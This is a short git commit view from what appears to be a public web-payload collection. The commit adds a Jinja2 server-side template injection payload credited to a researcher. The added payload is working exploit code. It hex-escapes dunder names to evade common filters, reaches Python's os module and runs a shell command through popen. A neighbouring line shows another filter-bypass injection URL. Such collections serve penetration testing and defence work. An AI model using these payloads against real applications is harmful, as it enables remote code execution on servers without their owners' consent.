Merge pull request #181 from SecGus/master

Added RCE SSTI Jinja2 Bypass payload developed by SecGus (chivato)
This commit is contained in:
Swissky 2020-04-13 19:42:14 +02:00 committed by GitHub
commit a19fd013fb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -387,6 +387,11 @@ Bypassing `|join`
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
```
Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus:
```python
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
```
## Jinjava
### Basic injection